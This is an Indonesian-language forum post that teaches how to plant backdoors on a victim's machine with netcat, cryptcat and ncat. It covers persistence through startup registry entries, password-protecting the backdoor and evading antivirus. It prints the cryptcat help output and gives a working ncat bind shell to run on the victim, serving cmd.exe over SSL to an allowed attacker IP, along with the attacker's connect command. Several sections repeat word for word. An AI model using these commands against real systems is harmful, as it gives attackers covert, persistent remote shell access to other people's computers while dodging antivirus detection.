04-24-2014, 02:13 PM
Kali ini kita akan membahas tentang backdoor menggunakan Netcat, Cryptcat, Ncat yang biasa digunakan untuk membuat komunikasi antara 2 host atau yang biasa disebut "back connect" .
[hide]
Netcat
Cryptcat
Ncat
[/hide]
[hide]
Netcat
Spoiler! :
Netcat digunakan sebagai backdoor. Setelah memperoleh akses ke mesin target, lalu membuat "netcat" agar berjalan pada startup dengan menambahkan pengaturan pada sistem registry. Dan kemudian attacker mendapatkan port yang terbuka untuk komunikasi antara attacker dengan victim. Berikut adalah tutorial tentang cara membuat netcat backdoor "netcat" meggunakan mentasploit
Namun perlu kita ketahui, ada beberapa kelemahan pada tools "netcat".
1. terdeteksi oleh antivirus
![[Image: netcat+-+virustotal.png]](https://3.bp.blogspot.com/-ez3Auhd3y24/U1h-BUXLZiI/AAAAAAAAAJc/0B1nsEsRp4w/s1600/netcat+-+virustotal.png)
2. clear text communication (tidak terenkripsi) membuat "netcat" dapat dengan mudah terdeteksi dan di block oleh antivirus.
3. siapa saja yg berada dalam 1 jaringan dapat melihat aktifitas komunikasi anda dengan target ketika sedang menggunakan netcat, dan bahkan bisa langsung mengakses backdoor yang telah kita buat karena tidak ada proteksi password pada backdoor netcat yang telah dibuat.
Namun perlu kita ketahui, ada beberapa kelemahan pada tools "netcat".
1. terdeteksi oleh antivirus
2. clear text communication (tidak terenkripsi) membuat "netcat" dapat dengan mudah terdeteksi dan di block oleh antivirus.
3. siapa saja yg berada dalam 1 jaringan dapat melihat aktifitas komunikasi anda dengan target ketika sedang menggunakan netcat, dan bahkan bisa langsung mengakses backdoor yang telah kita buat karena tidak ada proteksi password pada backdoor netcat yang telah dibuat.
Cryptcat
Spoiler! :
"cryptcat" = netcat + encryption
Cryptcat sama seperti netcat, namun terenkripsi dapat diproteksi dengan password.
Dalam kata lain
Pada OS Kali Linux & Backtrack sudah terinstall tools "cryptcat".
Pada OS yg belum terinstall "cryptcat" bisa mendownload sourcenya disini.
untuk OS Windows, download source nya disini, lalu compile source menggunakan visual studio agar menjadi file dengan ektensi .exe .
Cara penggunaan "cryptcat" kurang lebih sama dengan "netcat", untuk lebih jelasnya gunakan perintah cryptcat -h
root@kali:~# cryptcat -h
[v1.10]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-e prog program to exec after connect [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-k secret set the shared secret
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning].
bisa kita lihat terdapat option -k untuk men set password pada backdoor yang akan kita buat.
![[Image: cyptcat+-+virustotal.png]](https://1.bp.blogspot.com/-u_QX9bVVm7Y/U1iSY5iJzrI/AAAAAAAAAJs/aM-VxiO_LPY/s1600/cyptcat+-+virustotal.png)
Cryptcat sama seperti netcat, namun terenkripsi dapat diproteksi dengan password.
Dalam kata lain
Pada OS Kali Linux & Backtrack sudah terinstall tools "cryptcat".
Pada OS yg belum terinstall "cryptcat" bisa mendownload sourcenya disini.
- ekstrak menggunakan perintah tar -xvf cryptcat-unix-1.2.1.tar
- masuk ke direktori hasil ekstrak tadi cd unix
- compile menggunakan perintah make linux
untuk OS Windows, download source nya disini, lalu compile source menggunakan visual studio agar menjadi file dengan ektensi .exe .
Cara penggunaan "cryptcat" kurang lebih sama dengan "netcat", untuk lebih jelasnya gunakan perintah cryptcat -h
root@kali:~# cryptcat -h
[v1.10]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-e prog program to exec after connect [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-k secret set the shared secret
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning].
bisa kita lihat terdapat option -k untuk men set password pada backdoor yang akan kita buat.
Ncat
Spoiler! :
Ncat adalah projek dari Nmap yang telah mengembangkan beberapa bug yang ada pada tools "netcat".
Tools "ncat" untuk windows dapat di download disini.
contoh penggunaan "ncat", disini saya asumsikan IP address attacker & victim sebagai berikut:
attacker: 192.168.1.1
victim: 192.168.1.2
pada mesin victim:
ncat -lvp 445 --ssl -e cmd.exe --allow 192.168.1.1
maksud dari perintah diatas adalah koneksi menggunakan enkripsi ssl dan hanya memperbolekan IP 192.168.1.1
pada mesin attacker:
ncat 192.168.1.2 445 --ssl
untuk perintah option lainnya dapat dilihat menggunakan perintah ncat --help
dan tidak terdeteksi oleh antivirus
![[Image: ncat+-+virustotal.png]](https://2.bp.blogspot.com/-1hVQ1CS29EE/U1iaR9PwOVI/AAAAAAAAAJ8/iDIQ50LioJk/s1600/ncat+-+virustotal.png)
Tools "ncat" untuk windows dapat di download disini.
contoh penggunaan "ncat", disini saya asumsikan IP address attacker & victim sebagai berikut:
attacker: 192.168.1.1
victim: 192.168.1.2
pada mesin victim:
ncat -lvp 445 --ssl -e cmd.exe --allow 192.168.1.1
maksud dari perintah diatas adalah koneksi menggunakan enkripsi ssl dan hanya memperbolekan IP 192.168.1.1
pada mesin attacker:
ncat 192.168.1.2 445 --ssl
untuk perintah option lainnya dapat dilihat menggunakan perintah ncat --help
dan tidak terdeteksi oleh antivirus
